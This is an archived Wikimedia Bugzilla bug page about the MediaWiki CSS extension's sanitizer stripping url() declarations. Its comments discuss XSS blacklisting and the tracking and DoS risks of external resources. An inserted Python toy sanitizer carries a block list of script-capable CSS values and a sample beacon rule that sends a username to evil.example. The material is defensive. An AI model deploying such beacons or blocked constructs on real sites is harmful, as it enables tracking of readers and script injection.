Last modified: 2014-09-12 09:19:20 UTC

Wikimedia Bugzilla is closed!

Wikimedia migrated from Bugzilla to Phabricator. Bug reports are handled in Wikimedia Phabricator.
This static website is read-only and for historical purposes. It is not possible to log in, and except for displaying bug reports and their history, links might be broken. See T37820, the corresponding Phabricator task, for complete and up-to-date bug report information.
Bug 35820 - [CSS] Some CSS stripped by MediaWiki parser CSS sanitizer
Status: NEW
Product: MediaWiki extensions
Classification: Unclassified
Component: CSS
Version: unspecified
Hardware/OS: All / All
Importance: Normal enhancement
Target Milestone: ---
Assigned To: Nobody - You can work on this!
Depends on:
Blocks:
Reported: 2012-04-08 21:49 UTC by badon
Modified: 2014-09-12 09:19 UTC
CC: 10 users
See Also:



Description badon 2012-04-08 21:49:42 UTC
I have been unable to get background-image:url( someURL ) to work with this extension, like below:

{{#css:
	/*
		This code requires the CSS extension (previously used NewPageCSS)
		http://www.mediawiki.org/wiki/Extension:CSS
	*/

	.someClass { background-image:url(http://www.somedomain.com/w/images/0/06/someimage.png); }
}}

I believe it is due to Sanitizer::checkCss() as described by Brion here:

http://www.gossamer-threads.com/lists/wiki/mediawiki/233179

The CSS that gets sanitized by the parser is getting stripped out of the CSS extension too. 

However, the usual /* insecure input */ error message appears in the <head> of the page source, like this:

<style type="text/css">
/*<![CDATA[*/
/* insecure input */
/*]]>*/
</style>

The only way to get around this problem is to put the CSS in MediaWiki:Common.css.

There are good reasons for the parser to strip some CSS out, but in addition to documenting this issue (which this bug does, and I'll do in the extension docs in a moment), it should be configurable whether the CSS extension lets the parser sanitize, for example, when used on private wikis.
Comment 1 Quim Gil 2013-03-25 02:40:33 UTC
There is a proposal to improve Extension:CSS at

http://www.mediawiki.org/wiki/Mentorship_programs/Possible_projects#Improve_Extension:CSS

Pasting the part related with security to get more feedback:

"The CSS extension relies on basic blacklisting functionality in MediaWiki core to prevent XSS. It would be great if a proper CSS parser [1] was integrated and a set of whitelists implemented to offer various levels of capability/protection trade-offs.

For example, some wikis may want all CSS selectors prefixed with "#mw-content-text" and properties like "position", etc. disabled to limit the effect of styles to the article content. Other sites may want everything except XSS-able properties/values."

[1] https://github.com/sabberworm/PHP-CSS-Parser
Comment 2 Quim Gil 2013-10-31 05:22:57 UTC
This project proposal is now featured at https://www.mediawiki.org/wiki/Outreach_Program_for_Women/Round_7
Comment 3 Chris Steipp 2013-10-31 16:17:01 UTC
(In reply to comment #1)
> "The CSS extension relies on basic blacklisting functionality in MediaWiki core
> to prevent XSS. It would be great if a proper CSS parser [1] was integrated and
> a set of whitelists implemented to offer various levels of capability/protection
> trade-offs.

This sounds like a great project. I'd recommend looking at HTML Purifier's CSS rules as well, which would be great to integrate into either the extension, or core's CSS sanitization.

> [1] https://github.com/sabberworm/PHP-CSS-Parser
Comment 4 Bawolff (Brian Wolff) 2013-12-13 23:36:29 UTC
> There are good reasons for the parser to strip some CSS out, but in addition to
> documenting this issue (which this bug does, and I'll do in the extension docs
> in a moment), it should be configurable whether the CSS extension lets the
> parser sanitize, for example, when used on private wikis.

The reason the sanitizer doesn't let that through is that we don't want people to be able to load external resources from inline CSS:
* This could in theory be used as a DoS attack against somebody else if someone put it on a popular page.
* It can be used to track users, and associate usernames with IP addresses (i.e. have {{REVISIONUSER}} in the query string of the external resource).

(There could be other reasons. Those two are just the two I know about.)
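The following toy sanitizer is an added example written for this page; it is not MediaWiki's Sanitizer::checkCss and not the CSS extension's code (both are PHP; Python is used here only because it keeps the model short). The regexes, the Policy fields, the ALWAYS_BLOCKED_PROPERTIES list, the sample rules and the domain evil.example are assumptions made for illustration. It ties together comment 1 and comment 4 above: the default policy refuses url() in a declaration for the reasons Bawolff gives (every reader is made to fetch an external resource, and the query string can carry what {{REVISIONUSER}} expanded to); the normalisation step shows why a sanitizer must decode CSS escapes and strip comments before matching, since `u\72l(` and `ur/**/l(` are both `url(` to a browser; and the Policy knobs model the per-wiki trade-offs badon and Quim Gil ask for: allowing external URLs on a private wiki, or prefixing every selector with `#mw-content-text` and blocking `position` so styles cannot escape the article body.

```python
r"""Toy CSS declaration sanitizer modelling the trade-offs discussed in this bug.

Added example, not MediaWiki or Extension:CSS code. Regexes, policy knobs and
sample input are assumptions for illustration only.
"""
import re
from dataclasses import dataclass, field

# Constructed sample input: badon's rule from the report, a tracking beacon of
# the kind Bawolff describes (the query string carries what {{REVISIONUSER}}
# would have expanded to), and a harmless rule.
SAMPLE_CSS = """
/* requires Extension:CSS */
.someClass { background-image:url(http://www.somedomain.com/w/images/0/06/someimage.png); }
#tracker { background: url(http://evil.example/beacon?u=Alice); position: fixed; }
.safe { color: red; margin: 1em; }
"""

RULE_RE = re.compile(r"([^{}]+)\{([^{}]*)\}", re.S)      # flat rules only; no @media nesting
COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
ESCAPE_RE = re.compile(r"\\([0-9a-fA-F]{1,6})[ \t\r\n]?")  # CSS hex escape, e.g. \72 -> r
URL_RE = re.compile(r"url\s*\(", re.I)
DANGEROUS_VALUE_RE = re.compile(r"expression\s*\(|javascript\s*:|vbscript\s*:", re.I)
ALWAYS_BLOCKED_PROPERTIES = {"behavior", "-moz-binding"}   # legacy script hooks (assumed list)


@dataclass
class Policy:
    allow_external_urls: bool = False          # True only makes sense on a private wiki
    selector_prefix: str = ""                  # e.g. "#mw-content-text"
    blocked_properties: set = field(default_factory=set)   # e.g. {"position"}


def normalize(text):
    r"""Strip comments and decode hex escapes so `u\72l(` and `ur/**/l(` read as `url(`."""
    text = COMMENT_RE.sub("", text)
    return ESCAPE_RE.sub(lambda m: chr(min(int(m.group(1), 16), 0x10FFFF)), text)


def check_declaration(prop, value, policy):
    """Return True if a single `prop: value` declaration may pass under `policy`."""
    prop = normalize(prop).strip().lower()
    value = normalize(value)
    if prop in ALWAYS_BLOCKED_PROPERTIES or prop in policy.blocked_properties:
        return False
    if DANGEROUS_VALUE_RE.search(value):
        return False
    # url() is refused by default: it lets an editor make every reader fetch an
    # external resource (load on the target host, and a per-reader beacon).
    if URL_RE.search(value) and not policy.allow_external_urls:
        return False
    return True


def sanitize(css, policy):
    """Return (sanitized_css, dropped) where dropped lists (selector, property) pairs."""
    kept, dropped = [], []
    for m in RULE_RE.finditer(normalize(css)):
        selector = m.group(1).strip()
        decls = []
        for decl in m.group(2).split(";"):      # naive split; enough for this model
            if ":" not in decl:
                continue
            prop, value = (s.strip() for s in decl.split(":", 1))
            if check_declaration(prop, value, policy):
                decls.append(f"{prop}: {value}")
            else:
                dropped.append((selector, prop))
        if not decls:
            continue                             # a rule with nothing left is dropped whole
        if policy.selector_prefix:
            selector = ", ".join(f"{policy.selector_prefix} {s.strip()}"
                                 for s in selector.split(","))
        kept.append(f"{selector} {{ {'; '.join(decls)}; }}")
    return "\n".join(kept), dropped


if __name__ == "__main__":
    for name, policy in [
        ("default (public wiki)", Policy()),
        ("private wiki", Policy(allow_external_urls=True)),
        ("content-only", Policy(selector_prefix="#mw-content-text",
                                blocked_properties={"position"})),
    ]:
        out, dropped = sanitize(SAMPLE_CSS, policy)
        print(f"--- {name}: dropped {dropped}\n{out}")
```

Under the default policy both url() declarations are dropped and the `#tracker` rule survives only as `position: fixed`; with `allow_external_urls=True` everything passes, including the beacon, which is exactly the risk a private wiki would be accepting; with the content-only policy the `#tracker` rule disappears entirely and the surviving selector becomes `#mw-content-text .safe`. A real implementation would want a proper tokenizer rather than regexes, as comment 1 suggests.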
Comment 5 MZMcBride 2013-12-14 06:25:49 UTC
Bug 57891 is not an appropriate "see also"; removing.
Comment 6 Quim Gil 2014-09-12 09:19:20 UTC
A new round of FOSS OPW is coming. Should we keep https://www.mediawiki.org/wiki/Mentorship_programs/Possible_projects#Allowing_3rd_party_wiki_editors_to_run_more_CSS_features as a featured project? Meaning, does this project still make sense and are there mentors still available?
